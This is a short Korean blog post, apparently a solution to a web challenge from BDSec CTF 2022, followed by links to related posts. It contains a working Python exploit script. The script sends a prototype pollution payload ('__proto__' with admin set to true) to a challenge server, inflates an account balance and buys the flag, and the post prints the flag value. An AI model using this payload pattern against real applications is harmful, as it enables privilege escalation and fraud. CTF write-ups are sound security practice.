-
이 문제는 프로토 타입 취약점을 이용하여 풀 수 있었다.
귀찮아서 자세한 writeup은 나중에 써서 올리겠다.
import requests def req_post(api,postData): headers = {'content-type': 'application/json'} url = "http://206.189.236.145:3000/" + api res = session.post(url=url, headers=headers, data=postData) return res.text if __name__ == "__main__": session = requests.session() print(req_post('api/v1/sell','{"__proto__":{"admin": true}}')) print(req_post('api/v1/money','{"money": 2.5e+25}')) print(req_post('api/v1/buy','{"product":"flags","quantity":1}'))
Flag : BDSEC{mummy_i_can't_write_javaScript}
'CTF > BDSec CTF 2022' 카테고리의 다른 글
[BDSec CTF 2022] Awesome Calculator (0) 2022.07.22 [BDSec CTF 2022] Awesome Note Keeping (0) 2022.07.22 [BDSec CTF 2022] Jungle Templating (0) 2022.07.22 댓글